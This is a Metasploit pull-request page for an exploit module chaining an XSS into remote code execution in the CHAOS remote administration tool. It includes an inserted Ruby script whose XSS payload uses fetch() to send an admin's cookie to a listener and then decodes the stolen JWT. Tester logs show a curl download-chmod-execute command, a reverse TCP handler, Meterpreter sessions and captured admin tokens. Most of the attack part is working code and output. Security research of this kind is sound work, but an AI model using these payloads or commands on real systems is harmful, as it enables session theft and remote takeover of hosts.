rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

CHAOS rat xss to rce #19104

Open h00die opened 4 weeks ago

h00die commented 4 weeks ago

CHAOS v5.0.8 is a free and open-source Remote Administration Tool that allows generating binaries to control remote operating systems. The webapp contains a remote command execution vulnerability which can be triggered by an authenticated user when generating a new executable. The webapp also contains an XSS vulnerability within the view of a returned command being executed on an agent.

Execution can happen through one of three routes:

  1. Provided credentials can be used to execute the RCE directly
  2. A JWT token from an agent can be provided to emulate a compromised host. If a logged-in user attempts to execute a command on the host, the returned value contains an XSS payload.
  3. Similar to technique 2, an agent executable can be provided and the JWT token can be extracted.

Verified against CHAOS 7d5b20ad7e58e5b525abdcb3a12514b88e87cef2 running in a docker container.

Verification

  1. Install the application or run the docker image
  2. Start msfconsole
  3. Do: use exploit/linux/http/chaos_rat_xss_to_rce
  4. Do: set rhost [ip]
  5. Pick a method:
    1. set username [username], set password [password]
    2. set jwt [jwt token]
    3. set agent [path to agent]
  6. Do: run
  7. You should get a shell. Interaction by a CHAOS admin may be required.
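The cookie-theft leg of routes 2 and 3, modelled end to end as an added example. This is not the Metasploit module's code and not part of CHAOS: a rogue "agent" answers the operator's command with an XSS payload, a stand-in for the admin's browser renders it and leaks its cookie to a listener, and the stolen JWT is decoded to confirm it is an admin token and how long it lives. The two JWTs are copied from the console output further down this thread; the listener URL, the cookie name `jwt`, the exact payload markup and the simulated victim are assumptions.

```ruby
# Added example (not the Metasploit module's code, not part of CHAOS): models the
# cookie-theft leg of routes 2 and 3. A rogue "agent" answers an operator's command
# with an XSS payload; the admin's browser renders it and leaks its session cookie
# to a listener; the stolen JWT is decoded to confirm it is an admin token.
# Assumptions: listener URL, cookie name "jwt", payload markup, victim simulation.
require 'socket'
require 'json'
require 'uri'

# JWTs copied from the PR's console output (HS256; we hold no key, so unverified).
AGENT_JWT = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3NDY2OTMwMDAsInVzZXIiOiJkZWZhdWx0In0.E_TQ2pqNzZgRw5syoX_aXFjarI3CNvgP7DcVzLYVPu4'
ADMIN_JWT = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTUxNjc5MzUsIm9yaWdfaWF0IjoxNzE1MTY0MzM1LCJ1c2VyIjoiYWRtaW4ifQ.de-YBhkfbxKv7l25kw_oo6AELR6_U1nf2VD6JtWzBz4'

# The string a rogue agent returns as "command output". Rendered unescaped by the
# web UI, it makes the viewer's browser ship document.cookie to the listener.
def xss_payload(listener_url)
  "<img src=x onerror=\"fetch('#{listener_url}?c='+encodeURIComponent(document.cookie))\">"
end

def b64url_decode(str)
  str = str.tr('-_', '+/')
  str += '=' * ((4 - str.length % 4) % 4)   # JWT segments omit base64 padding
  str.unpack1('m0')
end

# Claims only: the signature is not checked (no HMAC key), which is also all the
# attack needs, since the server accepts the stolen cookie as-is.
def jwt_claims(token)
  parts = token.split('.')
  raise ArgumentError, 'not a three-part JWT' unless parts.length == 3
  JSON.parse(b64url_decode(parts[1]))
end

# Seconds the token was valid for (exp - orig_iat); nil when orig_iat is absent.
def token_lifetime(claims)
  claims['orig_iat'] && claims['exp'] - claims['orig_iat']
end

def expired?(claims, now = Time.now.to_i)
  now >= claims['exp']
end

# One-shot HTTP listener: accept the callback, answer 200, return the leaked cookie.
def catch_cookie(server)
  client = server.accept
  request_line = client.gets.to_s
  loop do                                   # drain headers up to the blank line
    line = client.gets
    break if line.nil? || line.strip.empty?
  end
  client.write "HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n"
  client.close
  query = request_line.split(' ')[1].to_s.split('?', 2)[1].to_s
  URI.decode_www_form(query).to_h['c']
end

# Stand-in for the admin's browser executing the payload's fetch().
def simulate_admin_browser(port, cookie)
  sock = TCPSocket.new('127.0.0.1', port)
  sock.write "GET /?c=#{URI.encode_www_form_component(cookie)} HTTP/1.1\r\n" \
             "Host: 127.0.0.1:#{port}\r\nConnection: close\r\n\r\n"
  sock.read                                  # wait for the listener's 200
  sock.close
end

def run_demo
  server = TCPServer.new('127.0.0.1', 0)    # port 0: let the OS pick a free port
  port = server.addr[1]
  payload = xss_payload("http://127.0.0.1:#{port}/")
  victim = Thread.new { simulate_admin_browser(port, "jwt=#{ADMIN_JWT}") }
  cookie = catch_cookie(server)
  victim.join
  server.close
  token = cookie[/[\w-]+\.[\w-]+\.[\w-]+/]   # pull the JWT out of the cookie string
  claims = jwt_claims(token)
  { payload: payload, token: token, claims: claims,
    admin: claims['user'] == 'admin', lifetime: token_lifetime(claims) }
end

if __FILE__ == $PROGRAM_NAME
  r = run_demo
  puts "agent token user: #{jwt_claims(AGENT_JWT)['user']}"
  puts "stolen token user: #{r[:claims]['user']} (valid for #{r[:lifetime]}s)"
end
```

The decoded claims are what make the three routes fit together: the agent token carries `user: default` and only lets you impersonate a host, while the cookie the admin's browser leaks carries `user: admin` with `exp - orig_iat` of 3600 seconds, so the RCE step has to follow the callback within the hour or the stolen session is useless.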
h00die commented 4 weeks ago

@chebuya wanted to bring this to your attention since you discovered it

cgranleese-r7 commented 1 week ago

Tested and seems to be working as intended 👍

Happy to land once the rest of the feedback is resolved.

Credential method

msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit

[*] Command to run on remote host: curl -so ./oYcqobeBZTuJ http://<ip>:9090/Odyz7kVKF-TYi8-49qC08A; chmod +x ./oYcqobeBZTuJ; ./oYcqobeBZTuJ &
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on <ip>:9090
[*] HTTP server started
[*] Adding resource /Odyz7kVKF-TYi8-49qC08A
[*] Started reverse TCP handler on <ip>:4444
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through direct login
[*] Attempting login
[*] Client <ip> requested /Odyz7kVKF-TYi8-49qC08A
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 1 opened (<ip>:4444 -> <ip>:47768) at 2024-05-08 10:23:11 +0100

Agent method

msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit

[*] Command to run on remote host: curl -so ./IyktmtoLxSkl http://<ip>:9090/7PTrmgXiZtm7zaMXvFhTIQ; chmod +x ./IyktmtoLxSkl; ./IyktmtoLxSkl &
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on <ip>:9090
[*] HTTP server started
[*] Adding resource /7PTrmgXiZtm7zaMXvFhTIQ
[*] Started reverse TCP handler on <ip>:4444
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through Agent
[*] Server address: 172.17.0.2
[*] Server port: 8080
[*] Server JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3NDY2OTMwMDAsInVzZXIiOiJkZWZhdWx0In0.E_TQ2pqNzZgRw5syoX_aXFjarI3CNvgP7DcVzLYVPu4
[*] Fake MAC for agent: b5:51:a0:d9:ee:f1
[*] Listening for XSS response on: http://<ip>:8888/
[*] Performing Callback Checkin
[*] WebSocket connecting to receive commands
[*] Performing Callback Checkin
[+] Received agent command 'whoami', sending XSS in return
[*] Received GET request.
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTUxNjc5MzUsIm9yaWdfaWF0IjoxNzE1MTY0MzM1LCJ1c2VyIjoiYWRtaW4ifQ.de-YBhkfbxKv7l25kw_oo6AELR6_U1nf2VD6JtWzBz4
[+] Detected Agents
Live Agents
===========

 IP            OS       Username                       Hostname  MAC
 --            --       --------                       --------  ---
 <ip>  Windows  Administrator (Administrator)  DC01      b5:51:a0:d9:ee:f1

[*] Client <ip> requested /7PTrmgXiZtm7zaMXvFhTIQ
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 1 opened (<ip>:4444 -> <ip>:61669) at 2024-05-08 11:32:31 +0100

JWT method

msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through JWT token
[*] Fake MAC for agent: fe:9a:14:40:91:66
[*] Listening for XSS response on: http://<ip>:8888/
[*] Performing Callback Checkin
[*] WebSocket connecting to receive commands
[*] Performing Callback Checkin
[+] Received agent command 'whoami', sending XSS in return
[*] Received GET request.
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTUxNjg1MDgsIm9yaWdfaWF0IjoxNzE1MTY0OTA4LCJ1c2VyIjoiYWRtaW4ifQ.8MjwkzGcIT0QatzRf6kMLMihBTdKyFQb1mrzGfJj9Ho
[+] Detected Agents
Live Agents
===========

 IP            OS       Username                       Hostname  MAC
 --            --       --------                       --------  ---
 <ip>  Windows  Administrator (Administrator)  DC01      a8:ae:8a:9e:e0:11
 <ip>  Windows  Administrator (Administrator)  DC01      fe:9a:14:40:91:66

[*] Client <ip> requested /Odyz7kVKF-TYi8-49qC08A
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 2 opened (<ip>:4444 -> <ip>:33236) at 2024-05-08 11:46:05 +0100